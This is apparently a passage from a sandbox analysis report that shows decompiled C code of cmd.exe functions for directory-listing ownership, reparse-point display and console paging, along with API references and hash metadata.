                                    			E011E6550(void* _a4, signed int _a8, void* _a12, signed int* _a16, void* _a20, signed int* _a24, char _a28, long _a32, char _a36, long _a40, short _a42, int _a44, void _a48, int _a564, int _a568, signed int _a572, int _a576, char _a612, void _a648, intOrPtr _a1152, char _a1156, int _a1168, signed int _a1172, char* _a1176, char _a1184, intOrPtr _a1208, void _a1212, signed int _a1220, signed short _a1222, signed int _a1224, signed int _a1226, signed int _a17612) {
                                    				struct _SECURITY_DESCRIPTOR* _v0;
                                    				void* _v4;
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				void* _v24;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				void* __ebp;
                                    				signed int _t187;
                                    				signed int _t190;
                                    				signed int _t191;
                                    				void* _t192;
                                    				signed int _t195;
                                    				signed int _t201;
                                    				signed int _t210;
                                    				signed int _t214;
                                    				signed int _t215;
                                    				intOrPtr _t216;
                                    				intOrPtr _t217;
                                    				signed int _t219;
                                    				signed int _t221;
                                    				signed int _t223;
                                    				signed int* _t228;
                                    				signed int _t237;
                                    				signed int _t240;
                                    				WCHAR* _t241;
                                    				void* _t242;
                                    				signed int _t243;
                                    				void* _t245;
                                    				signed int _t256;
                                    				void* _t257;
                                    				signed int _t272;
                                    				signed int _t273;
                                    				signed int _t277;
                                    				WCHAR* _t281;
                                    				signed int _t282;
                                    				signed int _t285;
                                    				signed int _t286;
                                    				signed int _t306;
                                    				struct _SECURITY_DESCRIPTOR* _t310;
                                    				signed int _t311;
                                    				void* _t312;
                                    				signed int _t313;
                                    				char* _t314;
                                    				struct _SECURITY_DESCRIPTOR* _t315;
                                    				void* _t316;
                                    				intOrPtr _t317;
                                    				intOrPtr* _t331;
                                    				void* _t337;
                                    				void* _t345;
                                    				void* _t364;
                                    				void* _t371;
                                    				void* _t373;
                                    				intOrPtr _t374;
                                    				intOrPtr _t381;
                                    				char* _t383;
                                    				intOrPtr _t388;
                                    				intOrPtr _t389;
                                    				signed int* _t394;
                                    				void* _t395;
                                    				int _t396;
                                    				void* _t399;
                                    				void* _t400;
                                    				signed int _t401;
                                    				signed int _t402;
                                    
                                    				_t402 = _t401 & 0xfffffff8;
                                    				E011E8290(0x44d4);
                                    				_t187 =  *0x11fd0b4; // 0x2833377e
                                    				_a17612 = _t187 ^ _t402;
                                    				_t371 = _a4;
                                    				_t310 = _a8;
                                    				_t399 = _a12;
                                    				_t394 = _a16;
                                    				_t316 =  &(_t310->Owner);
                                    				_a4 = _t316;
                                    				_t317 =  *((intOrPtr*)(_t316 + 0x1c));
                                    				 *((intOrPtr*)(_t371 + 0x28)) =  *((intOrPtr*)(_t371 + 0x28)) +  *((intOrPtr*)(_t316 + 0x20));
                                    				_a12 = _t371;
                                    				asm("adc [edx+0x2c], ecx");
                                    				_t190 =  *_t394;
                                    				_t372 = _t190;
                                    				_v0 = _t310;
                                    				_a24 = _t394;
                                    				if((_t190 & 0x00000010) != 0) {
                                    					__eflags = _t190;
                                    					if(_t190 < 0) {
                                    						goto L1;
                                    					}
                                    					 *_t394 = _t190 & 0xffffffef;
                                    					_t195 = E011E65F0(_t394, _a12, _t399, _t394);
                                    					_t372 =  *_t394 | 0x00000010;
                                    					 *_t394 = _t372;
                                    					__eflags = _t195;
                                    					if(_t195 != 0) {
                                    						L5:
                                    						_pop(_t395);
                                    						_pop(_t400);
                                    						_pop(_t312);
                                    						return E011E6FD0(_t195, _t312, _a17612 ^ _t402, _t372, _t395, _t400);
                                    					}
                                    					_t372 = _t372 | 0x80000000;
                                    					 *_t394 = _t372;
                                    				}
                                    				L1:
                                    				if((_t372 & 0x00000040) == 0) {
                                    					__eflags = _t372 & 0x00000004;
                                    					if((_t372 & 0x00000004) == 0) {
                                    						__eflags = _t372 & 0x00000402;
                                    						if(__eflags == 0) {
                                    							_t191 =  *(_t310 + 2) & 0x0000ffff;
                                    							__eflags = _t191;
                                    							if(_t191 == 0) {
                                    								_t192 = 0x2c;
                                    							} else {
                                    								_t192 = 0x2c + _t191 * 2;
                                    							}
                                    							_t311 = E011FA49A(_t399, _t372, _t192 +  &(_t310->Owner), _t317);
                                    							__eflags = _t311;
                                    							if(_t311 == 0) {
                                    								_t373 = 0xe;
                                    								E011F7A11(_t399, _t373);
                                    								_t372 = _t394[0x17];
                                    								_t311 = E011FA3E9(_t399, _t394[0x17],  *_t394, _a4);
                                    							}
                                    							__eflags =  *(_t399 + 8);
                                    							if( *(_t399 + 8) == 0) {
                                    								L4:
                                    								_t195 = _t311;
                                    								goto L5;
                                    							}
                                    							_t195 = E011DB610(_t311, _t399, _t394);
                                    							__eflags = _t195;
                                    							if(_t195 != 0) {
                                    								goto L5;
                                    							}
                                    							goto L4;
                                    						}
                                    						_t325 = _t399;
                                    						_t372 = _t394[0x17];
                                    						_t311 = E011FA2C1(_t310, _t399, _t394[0x17], __eflags, _t394[0x17], _a4);
                                    						_t200 = 0;
                                    						_a24 = 0;
                                    						__eflags = _t311;
                                    						if(_t311 != 0) {
                                    							L70:
                                    							__eflags =  *(_t399 + 8) - _t200;
                                    							if( *(_t399 + 8) == _t200) {
                                    								L72:
                                    								__eflags =  *_t394 & 0x00100000;
                                    								if(( *_t394 & 0x00100000) == 0) {
                                    									goto L4;
                                    								}
                                    								_t201 = E011E7797(_t325);
                                    								__eflags = _t201;
                                    								if(_t201 == 0) {
                                    									goto L4;
                                    								}
                                    								_a1172 = 1;
                                    								_a1176 = 0x104;
                                    								_a1168 = 0;
                                    								memset( &_a648, 0, 0x104);
                                    								_t402 = _t402 + 0xc;
                                    								__eflags = _a1172;
                                    								_t210 = E011E0C70( &_a648, ((0 | _a1172 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
                                    								__eflags = _t210;
                                    								if(_t210 < 0) {
                                    									L91:
                                    									__imp__??_V@YAXPAX@Z(_a1168);
                                    									goto L4;
                                    								}
                                    								_t329 = _a1168;
                                    								__eflags = _a1168;
                                    								if(_a1168 == 0) {
                                    									_t329 =  &_a648;
                                    								}
                                    								_t372 = _a1176;
                                    								_t214 = E011E51C9(_t329, _a1176,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
                                    								__eflags = _t214;
                                    								if(_t214 == 0) {
                                    									_t215 = _a1168;
                                    									__eflags = _t215;
                                    									if(_t215 == 0) {
                                    										_t215 =  &_a648;
                                    									}
                                    									_t372 = 0;
                                    									_t216 =  *0x121c00c(_t215, 0,  &_a48, 0);
                                    									_v16 = _t216;
                                    									__eflags = _t216 - 0xffffffff;
                                    									if(_t216 != 0xffffffff) {
                                    										do {
                                    											_t331 =  &_a40;
                                    											_t372 = _t331 + 2;
                                    											do {
                                    												_t217 =  *_t331;
                                    												_t331 = _t331 + 2;
                                    												__eflags = _t217 - _a16;
                                    											} while (_t217 != _a16);
                                    											__eflags = _t331 - _t372 >> 1 - 2;
                                    											if(__eflags < 0) {
                                    												L85:
                                    												_t372 =  *_t394;
                                    												_t219 = E011F9FD6(_t399,  *_t394, __eflags, _v12,  &_a32);
                                    												_t311 = _t219;
                                    												__eflags = _t311;
                                    												if(_t311 != 0) {
                                    													goto L89;
                                    												}
                                    												__eflags =  *(_t399 + 8) - _t219;
                                    												if( *(_t399 + 8) == _t219) {
                                    													goto L89;
                                    												}
                                    												_t223 = E011DB610(_t311, _t399, _t394);
                                    												_a8 = _t223;
                                    												__eflags = _t223;
                                    												if(_t223 == 0) {
                                    													goto L89;
                                    												}
                                    												__imp__??_V@YAXPAX@Z(_a1152);
                                    												_t195 = _a8;
                                    												goto L5;
                                    											}
                                    											__eflags = _a42 - 0x3a;
                                    											if(__eflags == 0) {
                                    												goto L89;
                                    											}
                                    											goto L85;
                                    											L89:
                                    											_t221 =  *0x121c038(_v16,  &_a32);
                                    											__eflags = _t221;
                                    										} while (_t221 != 0);
                                    										FindClose(_v24);
                                    									}
                                    								}
                                    								goto L91;
                                    							}
                                    							_t325 = _t399;
                                    							_t195 = E011DB610(_t311, _t399, _t394);
                                    							__eflags = _t195;
                                    							if(_t195 != 0) {
                                    								goto L5;
                                    							}
                                    							goto L72;
                                    						}
                                    						__eflags =  *_t394 & 0x00000400;
                                    						if(( *_t394 & 0x00000400) == 0) {
                                    							_t374 =  *0x11fd190; // 0x13
                                    							_t375 = _t374 + 0x13;
                                    							__eflags = _t374 + 0x13;
                                    						} else {
                                    							_t315 = _v0;
                                    							__eflags =  *(_t315 + 2);
                                    							if( *(_t315 + 2) != 0) {
                                    								_t389 =  *0x11fd190; // 0x13
                                    								_t364 = _t399;
                                    								E011F7A11(_t364, _t389 + 0x13);
                                    								_push(_t364);
                                    								E011E6740(_t399,  *_t394, _t315 + 0x30 + ( *(_t315 + 2) & 0x0000ffff) * 2);
                                    							}
                                    							_t388 =  *0x11fd190; // 0x13
                                    							_t375 = _t388 + 0x20;
                                    						}
                                    						_t337 = _t399;
                                    						E011F7A11(_t337, _t375);
                                    						_t372 =  *_t394;
                                    						_t313 = L"...";
                                    						_a8 = _t313;
                                    						__eflags = _t372 & 0x00040000;
                                    						if((_t372 & 0x00040000) == 0) {
                                    							L42:
                                    							_push(_t337);
                                    							_t325 = _t399;
                                    							_a16 = _a4 + 0x2c;
                                    							_t311 = E011E6740(_t399, _t372, _a4 + 0x2c);
                                    							_t228 = _v4;
                                    							__eflags =  *_t228 & 0x00000400;
                                    							if(( *_t228 & 0x00000400) == 0) {
                                    								L69:
                                    								_t200 = 0;
                                    								__eflags = 0;
                                    								goto L70;
                                    							}
                                    							__eflags = _t228[9] & 0x20000000;
                                    							if((_t228[9] & 0x20000000) == 0) {
                                    								goto L69;
                                    							}
                                    							_a568 = 1;
                                    							_a572 = 0x104;
                                    							_a564 = 0;
                                    							memset( &_a44, 0, 0x104);
                                    							_t402 = _t402 + 0xc;
                                    							__eflags = _a568;
                                    							_t237 = E011E0C70( &_a44, ((0 | _a568 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
                                    							__eflags = _t237;
                                    							if(_t237 < 0) {
                                    								L67:
                                    								_t372 = L"%s";
                                    								E011E6B76(_t399, L"%s", L" [.]");
                                    								L68:
                                    								__imp__??_V@YAXPAX@Z(_a564);
                                    								_pop(_t325);
                                    								goto L69;
                                    							}
                                    							_t341 = _a564;
                                    							__eflags = _a564;
                                    							if(_a564 == 0) {
                                    								_t341 =  &_a44;
                                    							}
                                    							_t240 = E011E51C9(_t341, _a572,  *((intOrPtr*)(_a8 + 4)), _a12);
                                    							__eflags = _t240;
                                    							if(_t240 != 0) {
                                    								goto L67;
                                    							} else {
                                    								_t241 = _a564;
                                    								__eflags = _t241;
                                    								if(_t241 == 0) {
                                    									_t241 =  &_a44;
                                    								}
                                    								_t242 = CreateFileW(_t241, 8, 7, 0, 3, 0x2200000, 0);
                                    								_a12 = _t242;
                                    								__eflags = _t242 - 0xffffffff;
                                    								if(_t242 != 0xffffffff) {
                                    									_t243 = DeviceIoControl(_t242, 0x900a8, 0, 0,  &_a1212, 0x4002,  &_a32, 0);
                                    									_t372 = L"%s";
                                    									_t345 = _t399;
                                    									__eflags = _t243;
                                    									if(_t243 != 0) {
                                    										E011E6B76(_t345, L"%s", L" [");
                                    										__eflags = _a1208 - 0xa0000003;
                                    										if(_a1208 != 0xa0000003) {
                                    											__eflags = _a1212 - 0xa000000c;
                                    											if(_a1212 != 0xa000000c) {
                                    												_t396 = 6;
                                    												L63:
                                    												_t133 = _t396 + 2; // 0x8
                                    												_t245 = E011E00B0(_t133);
                                    												_v4 = _t245;
                                    												__eflags = _t245;
                                    												if(_t245 != 0) {
                                    													memcpy(_t245, _a4, _t396);
                                    													_t402 = _t402 + 0xc;
                                    													__eflags = 0;
                                    													 *((short*)(_v4 + (_t396 >> 1) * 2)) = 0;
                                    													E011E6B76(_t399, L"%s", _v4);
                                    													E011E0040(_v8);
                                    												}
                                    												_t372 = L"%s";
                                    												E011E6B76(_t399, L"%s", "]");
                                    												_t394 = _a16;
                                    												goto L66;
                                    											}
                                    											_t396 = _a1226 & 0x0000ffff;
                                    											_a4 = _t402 + 0x4e4 + ((_a1224 & 0x0000ffff) >> 1) * 2;
                                    											__eflags = _t396;
                                    											if(_t396 != 0) {
                                    												goto L63;
                                    											}
                                    											_t256 = (_a1220 & 0x0000ffff) >> 1;
                                    											__eflags = _t256;
                                    											_t257 = _t402 + 0x4e4 + _t256 * 2;
                                    											L61:
                                    											_t396 = _a1222 & 0x0000ffff;
                                    											_a4 = _t257;
                                    											goto L63;
                                    										}
                                    										_t396 = _a1226 & 0x0000ffff;
                                    										_a4 = _t402 + 0x4e0 + ((_a1224 & 0x0000ffff) >> 1) * 2;
                                    										__eflags = _t396;
                                    										if(_t396 != 0) {
                                    											goto L63;
                                    										}
                                    										_t257 = _t402 + 0x4e0 + ((_a1220 & 0x0000ffff) >> 1) * 2;
                                    										goto L61;
                                    									}
                                    									_push(L" [...]");
                                    									goto L54;
                                    								} else {
                                    									_push(L" [..]");
                                    									_t372 = L"%s";
                                    									_t345 = _t399;
                                    									L54:
                                    									E011E6B76(_t345, _t372);
                                    									L66:
                                    									CloseHandle(_a12);
                                    									goto L68;
                                    								}
                                    							}
                                    						} else {
                                    							_a16 = 0x101;
                                    							_a20 = 0;
                                    							_a568 = 0;
                                    							_a28 = 0x10;
                                    							_a572 = 1;
                                    							_a576 = 0x104;
                                    							memset( &_a48, 0, 0x104);
                                    							_t402 = _t402 + 0xc;
                                    							__eflags = _a572;
                                    							_t272 = E011E0C70( &_a48, ((0 | _a572 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104);
                                    							__eflags = _t272;
                                    							if(_t272 >= 0) {
                                    								_t273 = E011E00B0(0x10000);
                                    								_v0 = _t273;
                                    								__eflags = _t273;
                                    								if(_t273 != 0) {
                                    									_t354 = _a568;
                                    									__eflags = _a568;
                                    									if(_a568 == 0) {
                                    										_t354 =  &_a48;
                                    									}
                                    									_t277 = E011E51C9(_t354, _a576,  *((intOrPtr*)(_a12 + 4)), _a4 + 0x2c);
                                    									__eflags = _t277;
                                    									if(_t277 != 0) {
                                    										L33:
                                    										E011E6B76(_t399, L"%s", _t313);
                                    										goto L36;
                                    									} else {
                                    										_t281 = _a568;
                                    										__eflags = _t281;
                                    										if(_t281 == 0) {
                                    											_t281 =  &_a48;
                                    										}
                                    										_t282 = GetFileSecurityW(_t281, 1, _v0, 0x10000,  &_a40);
                                    										__eflags = _t282;
                                    										if(_t282 == 0) {
                                    											goto L33;
                                    										} else {
                                    											_t285 = GetSecurityDescriptorOwner(_v0,  &_a20,  &_a44);
                                    											__eflags = _t285;
                                    											if(_t285 == 0) {
                                    												goto L33;
                                    											}
                                    											_t286 = E011E7797( &_a40);
                                    											__eflags = _t286;
                                    											if(_t286 == 0) {
                                    												L34:
                                    												_push(_t313);
                                    												_t383 = L"%s";
                                    												L35:
                                    												E011E6B76(_t399, _t383);
                                    												__eflags = 0;
                                    												_a16 = 0;
                                    												L36:
                                    												E011E0040(_v0);
                                    												L37:
                                    												__eflags =  *_t394 & 0x00000400;
                                    												_t381 =  *0x11fd190; // 0x13
                                    												if(( *_t394 & 0x00000400) == 0) {
                                    													_t382 = _t381 + 0x2a;
                                    													__eflags = _t381 + 0x2a;
                                    												} else {
                                    													_t382 = _t381 + 0x37;
                                    												}
                                    												E011F7A11(_t399, _t382);
                                    												L41:
                                    												__imp__??_V@YAXPAX@Z(_a568);
                                    												_t372 =  *_t394;
                                    												_pop(_t337);
                                    												goto L42;
                                    											}
                                    											 *0x121c034(0, _a20,  &_a648,  &_a16,  &_a1184,  &_a28,  &_a36);
                                    											__eflags = 0;
                                    											if(0 == 0) {
                                    												goto L34;
                                    											}
                                    											_t314 = L"%s";
                                    											E011E6B76(_t399, _t314,  &_a1156);
                                    											E011E6B76(_t399, _t314, "\\");
                                    											_t383 = _t314;
                                    											_push( &_a612);
                                    											goto L35;
                                    										}
                                    									}
                                    								}
                                    								E011E6B76(_t399, L"%s", _t313);
                                    								goto L37;
                                    							}
                                    							E011E6B76(_t399, L"%s", _t313);
                                    							goto L41;
                                    						}
                                    					}
                                    					_t306 = E011FAB79(_t399, _t372, _a4);
                                    					L3:
                                    					_t311 = _t306;
                                    					goto L4;
                                    				}
                                    				_t306 = E011E660F(_t399, _t372,  *((intOrPtr*)(_a12 + 4)), _a4);
                                    				goto L3;
                                    			}







































































                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: [...]$ [..]$ [.]$...$:
                                    • API String ID: 0-1980097535
                                    • Opcode ID: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction ID: ea77946fa626a114de49e8e16eda3abfc1c29951bf69ad6101efbe4a57f21a6c
                                    • Opcode Fuzzy Hash: 176c60cbcccae4737d6721d0a1cf677c4dfcf800aeadb6879143fea61ea850c4
                                    • Instruction Fuzzy Hash: C112D2702047029BDB2DDFA8C888AAFB7E5FF98704F04491DFA8597281EB30D945CB56
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E011DC5CA(void* __ecx, long __edx, void* _a4, signed int _a8) {
                                    				signed int _v8;
                                    				short _v16;
                                    				short _v20;
                                    				signed int _v26;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
                                    				signed int _v50;
                                    				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
                                    				long _v60;
                                    				signed int _v64;
                                    				void* _v68;
                                    				long _v72;
                                    				long _v76;
                                    				long _v80;
                                    				intOrPtr _v84;
                                    				char _v88;
                                    				void* _v108;
                                    				long _v112;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t63;
                                    				void* _t66;
                                    				long _t68;
                                    				long _t71;
                                    				char* _t81;
                                    				long _t85;
                                    				intOrPtr _t88;
                                    				signed int _t91;
                                    				long _t93;
                                    				long _t95;
                                    				signed short _t100;
                                    				struct _COORD _t105;
                                    				void* _t114;
                                    				void* _t115;
                                    				long _t119;
                                    				long _t122;
                                    				signed int _t125;
                                    				long _t128;
                                    				void* _t138;
                                    				void* _t141;
                                    				void* _t143;
                                    				signed int _t150;
                                    
                                    				_t63 =  *0x11fd0b4; // 0x2833377e
                                    				_v8 = _t63 ^ _t150;
                                    				_v64 = _a8;
                                    				_t141 = __ecx;
                                    				_v76 = __edx;
                                    				_t137 = 0;
                                    				_v72 = 0;
                                    				_t66 = E011E269C(_a8);
                                    				if(_t66 == 0) {
                                    					L13:
                                    					_t114 = 0;
                                    				} else {
                                    					__imp___get_osfhandle(__edx);
                                    					_t114 = _t66;
                                    					if(GetConsoleScreenBufferInfo(_t114,  &_v32) == 0) {
                                    						goto L13;
                                    					} else {
                                    						_t137 = _v16 - _v20 - 1;
                                    						_v72 = _t137;
                                    					}
                                    				}
                                    				_v60 = _v60 & 0x00000000;
                                    				_t119 = E011DC6F4(_t141, _a4, _v64);
                                    				_t133 = 0x120b980;
                                    				_v64 = _t119;
                                    				_t142 = _t119;
                                    				_v68 = 0x120b980;
                                    				if(_t119 == 0) {
                                    					_t68 = _v60;
                                    					goto L11;
                                    				} else {
                                    					do {
                                    						if(_t114 == 0) {
                                    							_t119 = _v76;
                                    							_t85 = E011E27C8(_t142 + _t142, _t133, _t142 + _t142,  &_v88);
                                    							__eflags = _t85;
                                    							if(_t85 == 0) {
                                    								L16:
                                    								_t68 = GetLastError();
                                    								_v60 = _t68;
                                    								break;
                                    							} else {
                                    								__eflags = _v88 - _t142 + _t142;
                                    								if(_v88 == _t142 + _t142) {
                                    									goto L9;
                                    								} else {
                                    									goto L16;
                                    								}
                                    							}
                                    						} else {
                                    							if( *0x1218065 != 0) {
                                    								_t128 =  *0x121851c;
                                    								__eflags = _t128 - _t137;
                                    								if(_t128 < _t137) {
                                    									L33:
                                    									_t143 = _t133;
                                    									_t88 = _t133 + _v64 * 2;
                                    									_v84 = _t88;
                                    									__eflags = _t133 - _t88;
                                    									if(_t133 < _t88) {
                                    										while(1) {
                                    											__eflags = _t128 - _t137;
                                    											if(_t128 >= _t137) {
                                    												break;
                                    											}
                                    											_t91 =  *_t143 & 0x0000ffff;
                                    											_t143 = _t143 + 2;
                                    											__eflags = _t91 - 0xa;
                                    											if(_t91 == 0xa) {
                                    												_t128 = _t128 + 1;
                                    												__eflags = _t128;
                                    											}
                                    											__eflags = _t143 - _v84;
                                    											if(_t143 < _v84) {
                                    												continue;
                                    											}
                                    											break;
                                    										}
                                    										 *0x121851c = _t128;
                                    									}
                                    									_t142 = _t143 - _t133 >> 1;
                                    									goto L8;
                                    								} else {
                                    									 *0x121851c = 0;
                                    									_t93 = GetConsoleScreenBufferInfo(_t114,  &_v32);
                                    									__eflags = _t93;
                                    									if(_t93 == 0) {
                                    										L32:
                                    										_t128 =  *0x121851c;
                                    										_t133 = _v68;
                                    										goto L33;
                                    									} else {
                                    										_t95 = WriteConsoleW(_t114,  *0x1218518,  *0x1218514,  &_v60, 0);
                                    										__eflags = _t95;
                                    										if(_t95 == 0) {
                                    											goto L32;
                                    										} else {
                                    											FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
                                    											GetConsoleMode(_t114,  &_v80);
                                    											_t100 = SetConsoleMode(_t114, 0);
                                    											__imp___getch();
                                    											_t137 = _t100 & 0x0000ffff;
                                    											SetConsoleMode(_t114, _v80);
                                    											GetConsoleScreenBufferInfo(_t114,  &_v56);
                                    											_t133 = _v32.dwSize * _v26;
                                    											_push( &_v60);
                                    											_t105 = _v32.dwCursorPosition;
                                    											_push(_t105);
                                    											_t142 = _v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition;
                                    											_push(_v56.dwSize * _v50 - _v32.dwSize * _v26 + _t105 + _v56.dwCursorPosition);
                                    											_push(0x20);
                                    											_push(_t114);
                                    											FillConsoleOutputCharacterW();
                                    											SetConsoleCursorPosition(_t114, _v32.dwCursorPosition);
                                    											__eflags = (_t100 & 0x0000ffff) - 3;
                                    											if((_t100 & 0x0000ffff) == 3) {
                                    												EnterCriticalSection( *0x1203858);
                                    												 *0x11fd544 = 1;
                                    												LeaveCriticalSection( *0x1203858);
                                    												_t68 = 0;
                                    												L12:
                                    												return E011E6FD0(_t68, _t114, _v8 ^ _t150, _t133, _t137, _t142);
                                    											} else {
                                    												_t137 = _v72;
                                    												goto L32;
                                    											}
                                    										}
                                    									}
                                    								}
                                    							} else {
                                    								_t142 = 0xa0;
                                    								if(_t119 <= 0xa0) {
                                    									_t142 = _t119;
                                    								}
                                    								L8:
                                    								if(WriteConsoleW(_t114, _t133, _t142,  &_v60, 0) == 0) {
                                    									_t68 = GetLastError();
                                    								} else {
                                    									L9:
                                    									_t68 = 0;
                                    								}
                                    								goto L10;
                                    							}
                                    						}
                                    						goto L55;
                                    						L10:
                                    						_t119 = _v64 - _t142;
                                    						_v60 = _t68;
                                    						_v64 = _t119;
                                    						_t133 = _v68 + _t142 * 2;
                                    						_v68 = _t133;
                                    					} while (_t119 != 0);
                                    					L11:
                                    					if(_t68 != 0) {
                                    						__eflags = _v76 - 2;
                                    						if(__eflags != 0) {
                                    							goto L12;
                                    						} else {
                                    							do {
                                    								__eflags = E011E4B60(__eflags, 0);
                                    							} while (__eflags == 0);
                                    							exit(1);
                                    							asm("int3");
                                    							while(1) {
                                    								L44:
                                    								__eflags = _t133 - _t114;
                                    								if(_t133 == _t114) {
                                    									_t119 = _t119 + 2;
                                    								}
                                    								while(1) {
                                    									_t134 = _t114;
                                    									_t71 = E011DD7D4(_t119, _t114);
                                    									_t122 = _t71;
                                    									__eflags = _t122;
                                    									if(_t122 == 0) {
                                    										break;
                                    									}
                                    									_t119 = _t122 + 2;
                                    									_t133 =  *_t119 & 0x0000ffff;
                                    									__eflags = _t133 - 0x31 - 8;
                                    									if(_t133 - 0x31 > 8) {
                                    										goto L44;
                                    									} else {
                                    										_t142 = _t142 + 1;
                                    										continue;
                                    									}
                                    									L24:
                                    									__eflags = _v8 ^ _t150;
                                    									return E011E6FD0(_t76, _t115, _v8 ^ _t150, _t134, _t137, _t142);
                                    									goto L55;
                                    								}
                                    								_t115 = _v108;
                                    								__eflags = _t142 - _a4;
                                    								if(_t142 > _a4) {
                                    									_t115 = HeapAlloc(GetProcessHeap(), 0, _t142 << 2);
                                    									__eflags = _t115;
                                    									if(_t115 != 0) {
                                    										_t125 = 0;
                                    										__eflags = _t142;
                                    										if(_t142 != 0) {
                                    											_t138 = _v108;
                                    											_t134 = _a4;
                                    											do {
                                    												__eflags = _t125 - _t134;
                                    												if(_t125 >= _t134) {
                                    													_t81 = " ";
                                    												} else {
                                    													 *_t138 =  *_t138 + 4;
                                    													_t81 =  *( *_t138 - 4);
                                    												}
                                    												 *(_t115 + _t125 * 4) = _t81;
                                    												_t125 = _t125 + 1;
                                    												__eflags = _t125 - _t142;
                                    											} while (_t125 < _t142);
                                    											_t137 = _v112;
                                    										}
                                    										_t142 = FormatMessageW(0x3800, 0, _t137, 0, 0x120b980, 0x2000, _t115);
                                    										RtlFreeHeap(GetProcessHeap(), 0, _t115);
                                    										goto L23;
                                    									}
                                    								} else {
                                    									_push(_t115);
                                    									_push(0x2000);
                                    									_push(0x120b980);
                                    									_push(_t71);
                                    									_push(_t137);
                                    									_push(_t71);
                                    									_push(0x1800);
                                    									_t142 = FormatMessageW();
                                    									L23:
                                    									_t76 = _t142;
                                    								}
                                    								goto L24;
                                    							}
                                    						}
                                    					} else {
                                    						goto L12;
                                    					}
                                    				}
                                    				L55:
                                    			}

                                    APIs
                                      • Part of subcall function 011E269C: _get_osfhandle.MSVCRT ref: 011E26A7
                                      • Part of subcall function 011E269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011DC5F8,?,?,?), ref: 011E26B6
                                      • Part of subcall function 011E269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26D2
                                      • Part of subcall function 011E269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,00000002), ref: 011E26E1
                                      • Part of subcall function 011E269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 011E26EC
                                      • Part of subcall function 011E269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011E26F5
                                    • _get_osfhandle.MSVCRT ref: 011DC601
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,011DC5C6,?,?,?,?,?,?,?,?,?,?,?,?,?,011DC5C6), ref: 011DC60F
                                    • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,0120B980,000000A0,00000000,00000000,?,?,?,?,?), ref: 011DC67C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?), ref: 011DC6DC
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC6E7
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                    • String ID:
                                    • API String ID: 2173784998-0
                                    • Opcode ID: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction ID: 893abb90bef1201fcfc3a439baa35969891ca4895b4f03057563b492d7a5f580
                                    • Opcode Fuzzy Hash: dd9d13557a7a5507b2bc74b34ce1d2ae7cd76e4caefc74f12ed37c7b82769426
                                    • Instruction Fuzzy Hash: 16818271E00119AFDF28DFA8F89CABEBBB9EF54715F01442AE906D7244DB309941CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E011D5AEF(void* __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8) {
                                    				signed int _v8;
                                    				char _v76;
                                    				short _v332;
                                    				signed short _v342;
                                    				signed short _v344;
                                    				signed short _v346;
                                    				struct _SYSTEMTIME _v348;
                                    				int _v352;
                                    				int _v356;
                                    				intOrPtr _v360;
                                    				intOrPtr _v364;
                                    				signed int _v368;
                                    				struct _FILETIME _v376;
                                    				struct _FILETIME _v384;
                                    				void _v420;
                                    				void* __ebx;
                                    				void* __edi;
                                    				void* __esi;
                                    				signed int _t78;
                                    				intOrPtr _t89;
                                    				void* _t90;
                                    				signed int _t96;
                                    				signed int _t97;
                                    				void* _t100;
                                    				void* _t101;
                                    				void* _t110;
                                    				void* _t111;
                                    				signed short _t118;
                                    				long _t128;
                                    				short* _t130;
                                    				void* _t136;
                                    				signed int _t139;
                                    				void* _t143;
                                    				void _t145;
                                    				void _t149;
                                    				signed int _t157;
                                    				signed int _t159;
                                    				signed int _t161;
                                    				int _t164;
                                    				void* _t172;
